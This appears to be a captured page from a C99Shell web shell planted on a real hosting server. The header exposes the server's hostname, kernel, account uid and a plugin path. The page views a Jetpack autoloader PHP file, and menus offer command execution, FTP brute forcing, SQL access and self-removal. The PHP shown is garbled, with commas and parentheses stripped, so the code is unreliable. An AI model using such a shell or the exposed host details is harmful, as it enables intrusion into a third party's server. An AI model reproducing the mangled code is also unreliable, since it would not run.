!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/vendor/   drwxr-xr-x
Free 293.44 GB of 429.69 GB (68.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-version-selector.php (1.83 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * This file was automatically generated by automattic/jetpack-autoloader.
 *
 * @package automattic/jetpack-autoloader
 */

namespace Automattic\Jetpack\Autoloader\jp5e9090adb7e03a3eeba3759a946171f6;

 
// phpcs:ignore

/**
 * Used to select package versions.
 */
class Version_Selector {

    
/**
     * Checks whether the selected package version should be updated. Composer development
     * package versions ('9999999-dev' or versions that start with 'dev-') are favored
     * when the JETPACK_AUTOLOAD_DEV constant is set to true.
     *
     * @param String $selected_version The currently selected package version.
     * @param String $compare_version The package version that is being evaluated to
     *                                determine if the version needs to be updated.
     *
     * @return Boolean Returns true if the selected package version should be updated,
     *                 else false.
     */
    
public function is_version_update_required$selected_version$compare_version ) {
        
$use_dev_versions defined'JETPACK_AUTOLOAD_DEV' ) && JETPACK_AUTOLOAD_DEV;

        if ( 
is_null$selected_version ) ) {
            return 
true;
        }

        if ( 
$use_dev_versions && $this->is_package_version_dev$selected_version ) ) {
            return 
false;
        }

        if ( 
$this->is_package_version_dev$compare_version ) ) {
            if ( 
$use_dev_versions ) {
                return 
true;
            } else {
                return 
false;
            }
        }

        if ( 
version_compare$selected_version$compare_version'<' ) ) {
            return 
true;
        }

        return 
false;
    }

    
/**
     * Checks whether the given package version is a development version.
     *
     * @param String $version The package version.
     *
     * @return Boolean True if the version is a dev version, else false.
     */
    
private function is_package_version_dev$version ) {
        if ( 
'dev-' === substr$version0) || '9999999-dev' === $version ) {
            return 
true;
        }

        return 
false;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0033 ]--